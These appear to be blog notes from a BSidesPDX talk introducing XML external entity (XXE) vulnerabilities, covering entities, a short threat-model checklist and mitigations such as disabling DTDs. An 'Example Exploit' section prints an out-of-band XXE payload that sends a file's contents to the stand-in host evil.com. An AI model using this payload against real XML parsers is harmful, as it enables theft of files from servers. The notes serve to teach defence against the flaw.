XXE For Dummies
XML eXternal Entities⌗
Notes from BSidesPDX talk by @brimy; giving a great introduction on how XXE vulnerabilities operate. Video posted
Added to the OWASP 10 in 2017⌗
Entities⌗
HTML “Entities” are the usual entrypoint.
& -> &
rendered, triggers.
XML has User-Defined Entities <!eNTITY xml “Extensible Markup Language”> %xml;
External Entities⌗
<!ENTITY chapter1 SYSTEM "chapter1.txt">
Tag rendering executes call to find the contents of chapter1.txt
and render it.
Enables users to execute XML at the rendering phase, and access and return sensitive data.
Example Exploit⌗
evil.com/evil.dtd http://evil.com/evil.htm?payload=&file;
<!ENTITY % all
"<!ENTITY send SYSTEM 'http://evil.com/evil.html?payload=%file;'>"
>
%all;
Threat Model Questions to Ask⌗
Does your server allow DTD? .Net is one of the primary vulnerabilities; .NET < 4.5.2 is vulnerable to default hacks.
- Do you allow external entities?(You shouldn’t)
- Do you validate un-trusted input?(You always should)
DO: Update Parsers, Disable DTD & XXE, validate input, if necessary set policies for resolving URLs.
Read other posts